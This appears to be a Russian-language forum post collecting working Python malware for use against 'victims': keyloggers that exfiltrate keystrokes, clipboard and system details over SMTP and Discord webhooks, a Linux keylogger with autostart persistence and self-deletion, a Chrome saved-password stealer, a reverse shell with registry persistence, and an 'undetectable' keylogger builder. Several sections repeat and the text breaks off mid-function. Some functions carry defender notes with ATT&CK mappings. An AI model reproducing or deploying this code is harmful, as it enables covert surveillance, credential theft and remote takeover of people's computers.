                with Listener(on_press = self.keyPress) as r:
                        r.join()

        def send(self):
                """POST the current buffer to the webhook as a single embed field."""
                embedM = []
                message = {"fields": [{"name": "KeyLogger Log", "value": f"{self.keys}", "inline": True}]}
                embedM.append(message)
                # Defender note: the hard-coded User-Agent below is a static
                # string and can serve as a proxy-log indicator.
                headers = {'Content-Type': 'application/json','User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11'}
                data = {"content": "","embeds": embedM}
                try:
                        urlopen(Request(self.webhook, data=dumps(data).encode(), headers=headers))
                except Exception as e:
                        # Every failure is swallowed, so nothing is printed or logged.
                        pass

if __name__=='__main__':
        keyScape(discord, timer).record()

Keylogger отправляет через email любых SMTP - запись с микрофона, вебкамеры, скриншоты, нажатые кнопки​



Установка:​

Скачать и установить Python https://www.python.org
Кликаем "Add Python to PATH" при установке
После установки Python откройте main.py
Впишите данные от Gmail или любой электронной почты, изменив сервер SMTP
Цифры вначале скрипта - это время

pip install certifi==2022.6.15 cffi==1.15.1 charset-normalizer==2.1.0 cryptography==37.0.4 idna==3.3 numpy==1.23.1 opencv-python==4.6.0.66 Pillow==9.2.0 pycparser==2.21 pynput==1.7.6 pywin32==304 requests==2.28.1 scipy==1.9.0 six==1.16.0 sounddevice==0.4.4 urllib3==1.26.11


main.py​


Python:
"""
KeyLogger Microphone, WebCamera, Screenshots, Audio Logging Feature 2023
"""

# Libraries
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email import encoders
import smtplib
import socket
import platform
import win32clipboard
from pynput.keyboard import Key, Listener
import time
import os
from scipy.io.wavfile import write
import sounddevice as sd
from cryptography.fernet import Fernet
from requests import get
from cv2 import VideoCapture, imshow, imwrite, destroyWindow, waitKey
from PIL import ImageGrab

# Global Variables
keys_info = "key_log.txt"
system_info = "syseminfo.txt"
clipboard_info = "clipboard.txt"
audio_info = "audio.wav"
screenshot_info = "screenshot.png"
webCamShot_info = "webCamera.png"

keys_info_e = "e_key_log.txt"
system_info_e = "e_systeminfo.txt"
clipboard_info_e = "e_clipboard.txt"

microphone_time = 10
time_iteration = 15
number_of_iterations_end = 3

email_address = "example@domain.com" # Enter disposable email here
password = "myPa55w0rd" # Enter email password here
toaddr = " " # Enter the email address you want to send your information to
key = " " # Generate an encryption key from the Cryptography folder
file_path = " " # Enter the file path you want your files to be saved to
extend = "\\"
file_merge = file_path + extend


# Send Email
def send_email(filename, attachment, toaddr):
    fromaddr = email_address
    msg = MIMEMultipart()
    msg['From'] = fromaddr
    msg['To'] = toaddr
    msg['Subject'] = "Log File"
    body = "Body_of_the_mail"
    msg.attach(MIMEText(body, 'plain'))
    filename = filename
    attachment = open(attachment, 'rb')
    p = MIMEBase('application', 'octet-stream')
    p.set_payload((attachment).read())
    encoders.encode_base64(p)
    p.add_header('Content-Disposition', "attachment; filename= %s" % filename)
    msg.attach(p)
    s = smtplib.SMTP('smtp.gmail.com', 587)
    s.starttls()
    s.login(fromaddr, password)
    text = msg.as_string()
    s.sendmail(fromaddr, toaddr, text)
    s.quit()

send_email(keys_info, file_path + extend + keys_info, toaddr)


# Get System Information
def system_information():
    """Append host details to the system-info file under file_merge.

    Records the public IP (looked up over HTTPS from api.ipify.org),
    processor, OS name and version, machine type, host name and the address
    the host name resolves to. This is host and network discovery (MITRE
    ATT&CK T1082, T1016).

    Defender notes: a request to a public "what is my IP" service from a
    process that is not a browser is a cheap and fairly reliable hunting
    signal in DNS and proxy logs.
    """
    with open(file_merge + system_info, "a") as f:
        hostname = socket.gethostname()
        IPAddr = socket.gethostbyname(hostname)
        try:
            public_ip = get("https://api.ipify.org").text
            f.write("Public IP Address: " + public_ip + '\n')
        except Exception:
            # Lookup failures are recorded in the file instead of raised.
            f.write("Couldn't get Public IP Address (May be due to max query) \n")

        f.write("Processor Info: " + (platform.processor()) + '\n')
        f.write("System Info: " + platform.system() + " " + platform.version() + '\n')
        f.write("Machine: " + platform.machine() + '\n')
        f.write("Hostname: " + hostname + '\n')
        f.write("Private IP Address: " + IPAddr + '\n')

system_information()

# Copy Clipboard Data
def copy_clipboard():
    """Append the current clipboard contents to the clipboard file.

    Opens the Windows clipboard, reads its data, closes it and writes the
    result under file_merge. This is clipboard collection (MITRE ATT&CK
    T1115).

    Defender notes: clipboard contents often include passwords copied from
    a password manager. Managers that clear the clipboard after a short
    timeout, or that fill fields without using the clipboard, narrow the
    window in which a read like this returns a secret.
    """
    with open(file_merge + clipboard_info, "a") as f:
        try:
            win32clipboard.OpenClipboard()
            pasted_data = win32clipboard.GetClipboardData()
            win32clipboard.CloseClipboard()
            f.write("Clipboard Data : \n" + pasted_data + '\n')
        except:
            # Any failure is recorded as a line in the file.
            f.write("Clipboard Could not be copied. \n")

copy_clipboard()

Криптография по ключу, поэтому сгенерируйте ключ, далее расшифруете

GenerateKey.py

[CODE=python]
from cryptography.fernet import Fernet

key = Fernet.generate_key()
file = open("encryption_key.txt", 'wb')
file.write(key)
file.close()

DecryptFile.py

Python:
from cryptography.fernet import Fernet

key = " " # Paste Your Key which is generated by Gernerate Key file.
system_information_e = 'e_system.txt'
clipboard_information_e = 'e_clipboard.txt'
keys_information_e = 'e_keys_logged.txt'

encrypted_files = [system_information_e, clipboard_information_e, keys_information_e]
count = 0

for decrypting_files in encrypted_files:
    with open(encrypted_files[count], 'rb') as f:
        data = f.read()

    fernet = Fernet(key)
    decrypted = fernet.decrypt(data)

    with open("decryption.txt", 'ab') as f:
        f.write(decrypted)
    count += 1

Keylogger Linux​

Установка:​

Скачать и установить Python https://www.python.org
После установки Python откройте keylogger.py
Впишите данные от Gmail или любой электронной почты, изменив сервер SMTP

Нужно запустить на linux жертвы
python3 keylogger.py

Либо создать elf файл
sudo apt install python3 && python3-pip
pip3 install pyinstaller
pyinstaller --noconsole --onefile keylogger.py


keylogger.py

Python:
import smtplib
from pynput.keyboard import Listener
import logging
from email.mime.multipart import MIMEMultipart
from email.mime.base import MIMEBase
from email import encoders
from threading import Thread, Timer
import os
import shutil
from time import sleep



user = os.path.expanduser('~')
yol = user + "/.config/autostart"
def starUp():
    """Create a desktop autostart entry and move it into ~/.config/autostart.

    Builds the text of a .desktop file whose Exec line runs keylogger.py
    from the user's home directory, writes it as keylog.py.desktop in the
    current directory and moves it to yol (the autostart directory defined
    above). This is XDG autostart persistence (MITRE ATT&CK T1547.013).

    Defender notes: file-creation monitoring on ~/.config/autostart (auditd
    or an equivalent file-integrity rule) catches this. Entries whose Exec
    line starts an interpreter on a script in the home directory deserve
    review.
    """
    # metin = template text; "calistir" is a placeholder replaced by the
    # home directory path.
    metin = "[Desktop Entry]\nType=Application\nExec=python3 calistir/keylogger.py\nHidden=false\nX-MATE-Autostart-enabled=true\nName[en_US]=keylog,Name=keylog\nComment[en_US]=\nComment=X-MATE-Autostart-Delay=0]"
    yeni = metin.replace("calistir", user)
    with open("keylog.py.desktop", "w+") as f:
        f.write(yeni)
    a = os.path.abspath('keylog.py.desktop')
    shutil.move(a, yol)


def heyLog():
    os.chdir(yol)
    dosya = open("log.txt", "a+")
    dosya.close()
    log_dir = ""
    logging.basicConfig(filename=(log_dir + "log.txt"), level=logging.DEBUG)

    def on_press(key):
        logging.info(str(key).strip("''"))

    with Listener(on_press=on_press) as listener:
        listener.join()


def sendMail():
    fromaddr = "hello@mail.com" #change your mail address
    toaddr = "hello@mail.com" #change your mail address
    msg = MIMEMultipart()
    filename = "log.txt"
    attachment = open(filename, "rb")
    p = MIMEBase('application', 'octet-stream')
    p.set_payload(attachment.read())
    encoders.encode_base64(p)
    p.add_header('Content-Disposition', "attachment; filename= %s" % filename)
    msg.attach(p)
    s = smtplib.SMTP('smtp.gmail.com', 587)
    s.starttls()
    s.login(fromaddr, "password") #change your password
    text = msg.as_string()
    s.sendmail(fromaddr, toaddr, text)
    s.quit()


def dosyaSil():
    """Delete the autostart entry and the log file, then kill this process.

    Removes keylog.py.desktop and log.txt from the autostart directory,
    waits two seconds and sends SIGKILL to its own PID. This is indicator
    removal by file deletion (MITRE ATT&CK T1070.004).

    Defender notes: because the artefacts are removed shortly after
    creation, point-in-time disk inspection may find nothing. Continuous
    telemetry (file create/delete events in ~/.config/autostart, process
    execution logs) is what preserves the evidence.
    """
    os.remove(yol + "/keylog.py.desktop")
    os.remove(yol + "/log.txt")
    a = os.getpid()
    sleep(2)
    os.system(f"kill -9 {a}")




if __name__ == "__main__":
    starUp()
    t1 = Thread(target=heyLog)
    t1.start()
    t2 = Timer(30.0, sendMail)# change mail send time
    t2.start()
    t3 = Timer(33.0, dosyaSil)# change file remove time
    t3.start()

Chrome Password Stealer​

Программа, предназначенная для того, чтобы показать, насколько легко получить доступ к личной информации, создавая passwords.txt с паролями

program.py

Python:
import os
import sqlite3
from Cryptodome.Cipher import AES
import json
import base64
import win32crypt

def closeChrome():
    try:
        os.system("taskkill /f /im chrome.exe")
    except:
        pass

def getSecretKey():
    """Return the unwrapped Chrome os_crypt key for the current user.

    Reads the Local State JSON from the user's Chrome profile directory,
    base64-decodes os_crypt.encrypted_key, drops the first five bytes and
    passes the rest to CryptUnprotectData. Prints a message and returns
    None on any failure.

    Defender notes: the unwrap is a DPAPI call made in the logged-on user's
    context, so any code running as that user can perform it; the control is
    keeping untrusted code from running as the user. A process other than
    the browser reading Local State is the signal to look for (object-access
    auditing on the file, or EDR file-read telemetry).
    """
    try:
        with open(os.path.normpath(r"%s\AppData\Local\Google\Chrome\User Data\Local State"%(os.environ['USERPROFILE'])), "r", encoding='utf-8') as f:
            local_state = f.read()
            local_state = json.loads(local_state)
        secret_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
        secret_key = secret_key[5:]
        secret_key = win32crypt.CryptUnprotectData(secret_key, None, None, None, 0)[1]
        return secret_key
    except Exception as e:
        print("Secret key not found")

def decryptPayload(cipher, payload):
    return cipher.decrypt(payload)

def generateCipher(aes_key, iv):
    return AES.new(aes_key, AES.MODE_GCM, iv)

def decryptPassword(ciphertext, secret_key):
    try:
        initialisation_vector = ciphertext[3:15]
        encrypted_password = ciphertext[15:-16]
        cipher = generateCipher(secret_key, initialisation_vector)
        decrypted_pass = decryptPayload(cipher, encrypted_password)
        decrypted_pass = decrypted_pass.decode()
        return decrypted_pass
    except:
        print("Cannot decrypt password")

def getChromePasswords():
    """Read saved logins from the default Chrome profile and decrypt them.

    Opens the profile's Login Data SQLite database, selects action_url,
    username_value and password_value from the logins table and, for rows
    with a non-empty user name and password, returns one formatted string
    per login. This is credential theft from a web browser (MITRE ATT&CK
    T1555.003).

    Defender notes: a non-browser process opening Login Data is a
    high-fidelity indicator; so is chrome.exe being force-terminated just
    before that access. Mitigations are outside the browser profile: a
    dedicated password manager with its own unlock, MFA on the accounts
    concerned, and rotating stored credentials after any suspected
    execution of code like this.
    """
    data_path = os.path.expanduser('~') + r'\AppData\Local\Google\Chrome\User Data\Default\Login Data'
    c = sqlite3.connect(data_path)
    cursor = c.cursor()
    select_statement = 'SELECT action_url, username_value, password_value FROM logins'
    cursor.execute(select_statement)
    login_data = cursor.fetchall()
    extractedData = []
    for userdatacombo in login_data:
        # Rows without both a user name and a password blob are skipped.
        if userdatacombo[1] != None and userdatacombo[2] != None and userdatacombo[1] != ""  and userdatacombo[2] != "":
            password = decryptPassword(userdatacombo[2], getSecretKey())
            data = "URL: " + userdatacombo[0] + " Username: " + userdatacombo[1] + " Password: " + str(password)
            extractedData.append(data)
        else:
            pass
    return extractedData

def savePasswords(data):
    with open("passwords.txt", "w") as f:
        for line in data:
            f.write(line + "\n")

def main():
    closeChrome()
    data = getChromePasswords()
    savePasswords(data)

main()


Вообще это reverse shell Python, поскольку предварительные команды рассчитаны на кражи файов и кейлогер, а такие аплоад любого файла, а также проверку административных привилегий, а также позволяет сделать скриншот, то решил добавить сюда.
Команды, разберётесь думаю:

    quit
    background
    help
    cd
    clear
    upload
    download
    screenshot
    keylog_start
    keylog_dump
    keylog_stop
    persistence
    sendall

Не забудьте поставить свой ip в rev_shell.py

rev_shell.py

import socket
import json
import subprocess
import time
import os
import pyautogui
import keylogger
import threading
import shutil
import sys

def reliable_send(data):
    jsondata = json.dumps(data)
    s.send(jsondata.encode())

def reliable_recv():
    data = ''
    while True:
        try:
            data = data + s.recv(1024).decode().rstrip()
            return json.loads(data)
        except ValueError:
            continue

def download_file(file_name):
    f = open(file_name, 'wb')
    s.settimeout(1)
    chunk = s.recv(1024)
    while chunk:
        f.write(chunk)
        try:
            chunk = s.recv(1024)
        except socket.timeout as e:
            break
    s.settimeout(None)
    f.close()

def upload_file(file_name):
    f = open(file_name, 'rb')
    s.send(f.read())

def screenshot():
    myScreenshot = pyautogui.screenshot()
    myScreenshot.save('screen.png')

def persist(reg_name, copy_name):
    """Copy the running executable into %APPDATA% and add a Run-key value.

    If the target file does not exist yet, copies sys.executable to
    %APPDATA%\\copy_name and runs reg.exe to add an HKCU Run value named
    reg_name pointing at the copy, then reports the outcome over the
    socket. This is registry run-key persistence (MITRE ATT&CK T1547.001).

    Defender notes: two artefacts are created, an executable written
    directly under the roaming AppData directory and a reg.exe child
    process whose command line adds a value under the CurrentVersion Run
    key. Process-creation logging with command lines (Sysmon event ID 1 or
    Security event 4688) and registry value-set events both record it.
    Application control that blocks execution from user-writable paths
    defeats the copied binary.
    """
    file_location = os.environ['appdata'] + '\\' + copy_name
    try:
        if not os.path.exists(file_location):
            shutil.copyfile(sys.executable, file_location)
            subprocess.call('reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ' + reg_name + ' /t REG_SZ /d "' + file_location + '"', shell=True)
            reliable_send('[+] Created Persistence With Reg Key: ' + reg_name)
        else:
            reliable_send('[+] Persistence Already Exists')
    except:
        reliable_send('[+] Error Creating Persistence With The Target Machine')

def connection():
    """Try to connect out to the hard-coded address, waiting 20 s per attempt.

    Sleeps 20 seconds, attempts an outbound TCP connection to the address
    and port below and, on success, hands control to shell(). On any
    exception it calls itself again.

    Defender notes: the connection is initiated from the inside, so inbound
    firewall rules do not apply; egress filtering and outbound-connection
    telemetry do. Repeated connection attempts from one process to one
    destination at a fixed 20-second interval form a beaconing pattern that
    network monitoring can flag.
    """
    while True:
        time.sleep(20)
        try:
            s.connect(('192.168.1.4', 5555))
            shell()
            s.close()
            break
        except:
            connection()

def shell():
    while True:
        command = reliable_recv()
        if command == 'quit':
            break
        elif command == 'background':
            pass
        elif command == 'help':
            pass
        elif command == 'clear':
            pass
        elif command[:3] == 'cd ':
            os.chdir(command[3:])
        elif command[:6] == 'upload':
            download_file(command[7:])
        elif command[:8] == 'download':
            upload_file(command[9:])
        elif command[:10] == 'screenshot':
            screenshot()
            upload_file('screen.png')
            os.remove('screen.png')
        elif command[:12] == 'keylog_start':
            keylog = keylogger.Keylogger()
            t = threading.Thread(target=keylog.start)
            t.start()
            reliable_send('[+] Keylogger Started!')
        elif command[:11] == 'keylog_dump':
            logs = keylog.read_logs()
            reliable_send(logs)
        elif command[:11] == 'keylog_stop':
            keylog.self_destruct()
            t.join()
            reliable_send('[+] Keylogger Stopped!')
        elif command[:11] == 'persistence':
            reg_name, copy_name = command[12:].split(' ')
            persist(reg_name, copy_name)
        elif command[:7] == 'sendall':
            subprocess.Popen(command[8:], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,stdin = subprocess.PIPE)
        else:
            execute = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,stdin=subprocess.PIPE)
            result = execute.stdout.read() + execute.stderr.read()
            result = result.decode()
            reliable_send(result)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection()

keylogger.py

import os
from pynput.keyboard import Listener
import time
import threading


class Keylogger():
    keys = []
    count = 0
    flag = 0
    path = os.environ['appdata'] +'\\processmanager.txt'
    #path = 'processmanager.txt'

    def on_press(self, key):
        self.keys.append(key)
        self.count += 1

        if self.count >= 1:
            self.count = 0
            self.write_file(self.keys)
            self.keys = []

    def read_logs(self):
        with open(self.path, 'rt') as f:
            return f.read()

    def write_file(self, keys):
        with open(self.path, 'a') as f:
            for key in keys:
                k = str(key).replace("'", "")
                if k.find('backspace') > 0:
                    f.write(' Backspace ')
                elif k.find('enter') > 0:
                    f.write('\n')
                elif k.find('shift') > 0:
                    f.write(' Shift ')
                elif k.find('space') > 0:
                    f.write(' ')
                elif k.find('caps_lock') > 0:
                    f.write(' caps_lock ')
                elif k.find('Key'):
                    f.write(k)

    def self_destruct(self):
        self.flag = 1
        listener.stop()
        os.remove(self.path)

    def start(self):
        global listener
        with Listener(on_press=self.on_press) as listener:
            listener.join()

if __name__ == '__main__':
    keylog = Keylogger()
    t = threading.Thread(target=keylog.start)
    t.start()
    while keylog.flag != 1:
        time.sleep(10)
        logs = keylog.read_logs()
        print(logs)
        #keylog.self_destruct()
    t.join()

 


FUD KeyLogger Python
FUD KeyLogger Python полностью не обнаруживается, шифрует данные в INT, отправляет данные в Discord!

Запустите client.py и создайте полезную нагрузку
Затем полезная нагрузка (ezkey.pyw) будет модифицирована с вашим WebHook от Discord
Отредактируйте имя полезной нагрузки и скомпилируйте его, но это не обязательно
Отправьте полезную нагрузку своей жертве

Как только жертва выполнит полезную нагрузку, она запустит KeyLogger в фоновом режиме. Каждый ключ будет записан и сохранен на MatPlot.cache
Каждый раз, когда достигается maxlen var (выбираемый пользователем при создании полезной нагрузки), keylogger отправляет файл, содержащий данные через webhook
Данные будут зашифрованы в INT, поэтому их будет сложнее обнаружить, на сегодня 0/60 по шкале вирустотала

sudo apt install python3 && python3-pip
pip3 install requests asyncio flaskwebgui nicegui

client.py

from flaskwebgui import FlaskUI
from nicegui import ui, events

import random
import os

__title__ = "EZKey"

ui.colors(primary='#333')

def convert_text(text):
    string = ""
    for _encoded_int in text.split("\r\n"):
        for encoded_int in _encoded_int.split(" "):
            if encoded_int == "":
                continue
            
            decoded_bytes = int(str(encoded_int)).to_bytes((int(encoded_int).bit_length() + 7) // 8, byteorder='big')
            decoded_string = decoded_bytes.decode()

            string += f" {decoded_string}"
    return string

def __makebuild(webh_url, max_len):
    if webh_url == "":
        return ui.notify(f"Please enter a webhook url!", timeout=30, progress=True, color="red", position="top-left")
    
    ui.notify(f"Build is starting!", timeout=30, progress=True, color="orange", position="top-left")
    
    with open("ezkey.pyw", "r") as f:
        _ezkey = f.read()
        
    _ezkey = _ezkey.replace("discord_webhook = \"xpierroz on top\"", f"discord_webhook = \"{webh_url}\"")
    _ezkey = _ezkey.replace(
        "self.__max_len_file = 10", "self.__max_len_file = {}"
        .format(max_len if max_len != "" else 10
                )
        )
    
    with open("ezkey.pyw", "w") as f:
        f.write(_ezkey)
        
    ui.notify(f"Build has finished!", timeout=30, progress=True, color="green", position="top-left")

def _home():
    ui.label("EZKey Builder").classes('text-center text-xl font-bold')
    
    with ui.column():
        webh_url = ui.input(label='WebHook URL', placeholder='EZKey my g').props('inline color=orange-3').classes('w-full')
        max_len = ui.input(label='MaxLines len (default 10)', placeholder='u should enter 10').props('inline color=orange-3').classes('w-full')
        ui.button('Build', on_click=lambda: __makebuild(webh_url.value, max_len.value)).props("icon=build color=orange-3").classes('w-full')
        
def _translate(text):
    random_number = random.randint(0, 100000)
    name = f"translated_{random_number}.txt"
    with open(name, "w") as f:
        f.write(text)
        
    return name
        
def translate(text):
    name = _translate(text)
    os.startfile(name)
    
def _decoder():
    with ui.dialog().props('full-width') as dialog:
        with ui.card():
            content = ui.markdown()

    def handle_upload(e: events.UploadEventArguments):
        text = e.content.read().decode('utf-8')
        _converted = convert_text(text)
        content.set_content(_converted)
        translate(_converted)
    with ui.column():
        ui.label("Open your .cache file").classes('text-xl font-bold')
        with ui.row():
            ui.upload(on_upload=handle_upload, multiple=False, auto_upload=True).props('accept=.cache color=orange-3').classes('max-w-full centered')

with ui.tabs().classes('w-full center') as tabs:
    ui.tab('Home', icon='home')
    ui.tab('Decoder', icon='lock_open')

with ui.tab_panels(tabs, value='Home').classes('bg-transparent').classes('w-full center'):
    with ui.tab_panel('Home'):
        _home()
    with ui.tab_panel('Decoder'):
        _decoder()
            
def start_nicegui(**kwargs):
    ui.run(
        title=__title__,
        **kwargs
    )

if __name__ in {"__main__", "__mp_main__"}:
    DEBUG = False

    if DEBUG:
        ui.run()
    else:
        FlaskUI(
            server=start_nicegui,
            server_kwargs={"dark": True, "reload": False, "show": False, "port": 3000},
            width=500,
            height=650,
        ).run()

ezkey.pyw

from pynput import keyboard
from pynput import mouse

from discord_webhook import AsyncDiscordWebhook, DiscordWebhook, DiscordEmbed
import requests
import asyncio

import os
 
__author__ = "xpierroz"

discord_webhook = "xpierroz on top"

__r = requests.get('https://api.ipify.org/').text
__c = os.getenv('COMPUTERNAME')


async def _send_data():
    webhook = AsyncDiscordWebhook(
            url=discord_webhook,
            rate_limit_retry=True,
        )
            

    embed = DiscordEmbed(title='EZKey Grabber', description=f'Data from {__c} | {__r}', color='544C53')
    with open("MatPlot.cache", "rb") as f:
        webhook.add_file(file=f.read(), filename='fuck.cache')
    webhook.add_embed(embed)
    await webhook.execute(remove_embeds=True)
    webhook.remove_files()

class Logger():
    def __init__(self):
        self.__max_len_file = 10
        self.word = ""
        self.data = []
        #self.webhook = DiscordWebhook(
        #    url=discord_webhook,
        #    rate_limit_retry=True,
        #    content="New data"
        #)
            

    def send_data(self):
        asyncio.run(_send_data())
        return
        #embed = DiscordEmbed(title='EZKey Grabber', description=f'Data from {self.__c} | {self.__r}', color='544C53')
        #with open("MatPlot.cache", "rb") as f:
        #    self.webhook.add_file(file=f.read(), filename='fuck.cache')
        #self.webhook.add_embed(embed)
        #self.webhook.execute(remove_embeds=True)
        #self.webhook.remove_files()
        
    def erase_file(self):
        with open("MatPlot.cache", "w") as f:
            f.write("")
        
    def get_lenfile(self):
        with open("MatPlot.cache", "r") as f:
            return len(f.readlines())
        
    def convert_data(self):
        #Used to convert stuff like \x14 to CTRL4, you can see all the translations here
        # -> https://condor.depaul.edu/sjost/lsp121/documents/ascii-npr.htm
        # By the way don't forget that in most cases ^ is the CTRL key, but it can't still be used apart
        # and I have nothing to prevent that but I don't care just make a pr lol

        _data = []
        for elem in self.data:
            new_elem = ""
            for char in elem:
                if 0 <= ord(char) <= 31:
                    new_elem += " CTRL + " + chr(ord(char) + 64) + " "
                else:
                    new_elem += char
            _data.append(new_elem)

        
        int_dat = [] # Basic stuff to convert a str to int so if somebody opens this file he aint gonna understand
        for element in _data:
            encoded_bytes = element.encode()
            encoded_int = int.from_bytes(encoded_bytes, byteorder='big')
            int_dat.append(encoded_int)
            
        return int_dat       
        
    def write_data(self):
        _dat = self.convert_data()
        with open("MatPlot.cache", "a+") as f:
            for word in _dat:
                f.write(str(word)) # Might not need to convert to str but we neva know aight
                f.write(" ")
            f.write("\n")
        self.data = []
        
    def check_data(self):
        if len(self.data) > 10:
            self.write_data()
            if self.get_lenfile() > self.__max_len_file:
                self.send_data()
                self.erase_file()
            self.data = []
    
    def on_press(self, key):
        try:
            if key.char == " ":
                self.data.append(self.word)
                self.word = ""
            else:
                self.word += key.char
        except AttributeError:
            if key == keyboard.Key.backspace:
                self.word = self.word[:-1]
            if key == keyboard.Key.space or key == keyboard.Key.enter:
                self.data.append(self.word)
                self.word = ""
            elif key == keyboard.Key.ctrl_l:
                return
            elif not self.word == "":
                self.data.append(self.word)
        self.check_data()
            

    def on_mouse_press(self, *args):
        #print(*args)
        pass
    
logger = Logger()
listener = keyboard.Listener(
    on_press=logger.on_press)
listener.start()

listenerx = mouse.Listener(
    on_click=logger.on_mouse_press
)
listenerx.start()

while True:
    #print(logger.data)
    pass

 

Telegram Stealer v3.0
Stealer Telegram Session c обходом 2FA с использованием Python, переделанного в exe.
Отправляет через FTP сервер. Подобный скрипт уже есть выше, понравился чем-то, но пайтон интереснее.

В конце скрипта впишите FTP данные, можете воспользоваться FileZilla https://filezilla-project.org/.
Как жертва откроет, у себя на компе замените данные в Telegram Portable на присланные в архиве, папка tdata.
 
Это reverse shell Python, поскольку предварительные команды рассчитаны на кражи файов и кейлогер, а такие аплоад любого файла, а также проверку административных привилегий, а также позволяет сделать скриншот, то решл добавить сюда.

Команды, разберётесь думаю:​

  • quit
  • background
  • help
  • cd
  • clear
  • upload
  • download
  • screenshot
  • keylog_start
  • keylog_dump
  • keylog_stop
  • persistence
  • sendall
Не забудьте поставить свой ip в rev_shell.py


rev_shell.py

Python:
import socket
import json
import subprocess
import time
import os
import pyautogui
import keylogger
import threading
import shutil
import sys

def reliable_send(data):
    jsondata = json.dumps(data)
    s.send(jsondata.encode())

def reliable_recv():
    data = ''
    while True:
        try:
            data = data + s.recv(1024).decode().rstrip()
            return json.loads(data)
        except ValueError:
            continue

def download_file(file_name):
    f = open(file_name, 'wb')
    s.settimeout(1)
    chunk = s.recv(1024)
    while chunk:
        f.write(chunk)
        try:
            chunk = s.recv(1024)
        except socket.timeout as e:
            break
    s.settimeout(None)
    f.close()

def upload_file(file_name):
    f = open(file_name, 'rb')
    s.send(f.read())

def screenshot():
    myScreenshot = pyautogui.screenshot()
    myScreenshot.save('screen.png')

def persist(reg_name, copy_name):
    file_location = os.environ['appdata'] + '\\' + copy_name
    try:
        if not os.path.exists(file_location):
            shutil.copyfile(sys.executable, file_location)
            subprocess.call('reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ' + reg_name + ' /t REG_SZ /d "' + file_location + '"', shell=True)
            reliable_send('[+] Created Persistence With Reg Key: ' + reg_name)
        else:
            reliable_send('[+] Persistence Already Exists')
    except:
        reliable_send('[+] Error Creating Persistence With The Target Machine')

def connection():
    while True:
        time.sleep(20)
        try:
            s.connect(('192.168.1.4', 5555))
            shell()
            s.close()
            break
        except:
            connection()

def shell():
    while True:
        command = reliable_recv()
        if command == 'quit':
            break
        elif command == 'background':
            pass
        elif command == 'help':
            pass
        elif command == 'clear':
            pass
        elif command[:3] == 'cd ':
            os.chdir(command[3:])
        elif command[:6] == 'upload':
            download_file(command[7:])
        elif command[:8] == 'download':
            upload_file(command[9:])
        elif command[:10] == 'screenshot':
            screenshot()
            upload_file('screen.png')
            os.remove('screen.png')
        elif command[:12] == 'keylog_start':
            keylog = keylogger.Keylogger()
            t = threading.Thread(target=keylog.start)
            t.start()
            reliable_send('[+] Keylogger Started!')
        elif command[:11] == 'keylog_dump':
            logs = keylog.read_logs()
            reliable_send(logs)
        elif command[:11] == 'keylog_stop':
            keylog.self_destruct()
            t.join()
            reliable_send('[+] Keylogger Stopped!')
        elif command[:11] == 'persistence':
            reg_name, copy_name = command[12:].split(' ')
            persist(reg_name, copy_name)
        elif command[:7] == 'sendall':
            subprocess.Popen(command[8:], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,stdin = subprocess.PIPE)
        else:
            execute = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,stdin=subprocess.PIPE)
            result = execute.stdout.read() + execute.stderr.read()
            result = result.decode()
            reliable_send(result)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection()

keylogger.py


Python:
import os
from pynput.keyboard import Listener
import time
import threading


class Keylogger():
    keys = []
    count = 0
    flag = 0
    path = os.environ['appdata'] +'\\processmanager.txt'
    #path = 'processmanager.txt'

    def on_press(self, key):
        self.keys.append(key)
        self.count += 1

        if self.count >= 1:
            self.count = 0
            self.write_file(self.keys)
            self.keys = []

    def read_logs(self):
        with open(self.path, 'rt') as f:
            return f.read()

    def write_file(self, keys):
        with open(self.path, 'a') as f:
            for key in keys:
                k = str(key).replace("'", "")
                if k.find('backspace') > 0:
                    f.write(' Backspace ')
                elif k.find('enter') > 0:
                    f.write('\n')
                elif k.find('shift') > 0:
                    f.write(' Shift ')
                elif k.find('space') > 0:
                    f.write(' ')
                elif k.find('caps_lock') > 0:
                    f.write(' caps_lock ')
                elif k.find('Key'):
                    f.write(k)

    def self_destruct(self):
        self.flag = 1
        listener.stop()
        os.remove(self.path)

    def start(self):
        global listener
        with Listener(on_press=self.on_press) as listener:
            listener.join()

if __name__ == '__main__':
    keylog = Keylogger()
    t = threading.Thread(target=keylog.start)
    t.start()
    while keylog.flag != 1:
        time.sleep(10)
        logs = keylog.read_logs()
        print(logs)
        #keylog.self_destruct()
    t.join()


FUD KeyLogger Python полностью не обнаруживается, шифрует данные в INT, отправляет данные в Discord!

Запустите client.py и создайте полезную нагрузку
Затем полезная нагрузка (ezkey.pyw) будет модифицирована с вашим WebHook от Discord
Отредактируйте имя полезной нагрузки и скомпилируйте его, но это не обязательно
Отправьте полезную нагрузку своей жертве

Как только жертва выполнит полезную нагрузку, она запустит KeyLogger в фоновом режиме. Каждый ключ будет записан и сохранен на MatPlot.cache
Каждый раз, когда достигается maxlen var (выбираемый пользователем при создании полезной нагрузки), keylogger отправляет файл, содержащий данные через webhook
Данные будут зашифрованы в INT, поэтому их будет сложнее обнаружить, на сегодня 0/60 по шкале вирустотала

sudo apt install python3 && python3-pip
pip3 install requests asyncio flaskwebgui nicegui


client.py

Python:
       from flaskwebgui import FlaskUI
from nicegui import ui, events

import random
import os

__title__ = "EZKey"

ui.colors(primary='#333')

def convert_text(text):
    """Decode a captured ``.cache`` payload back into readable text.

    The payload is a sequence of decimal integers separated by single spaces,
    with records separated by CRLF. Each integer is the big-endian byte string
    of one word, decoded here with the default UTF-8 codec. Every decoded word
    is prefixed with one space in the returned string.

    Analyst note: this is a keyless, fully reversible encoding rather than
    encryption, so a recovered payload file can be read back with this
    function alone.
    """
    decoded_words = []
    for record in text.split("\r\n"):
        for token in record.split(" "):
            # Consecutive or trailing separators yield empty tokens; ignore them.
            if token == "":
                continue

            value = int(str(token))
            # Smallest number of bytes that can hold the integer (0 bytes for 0).
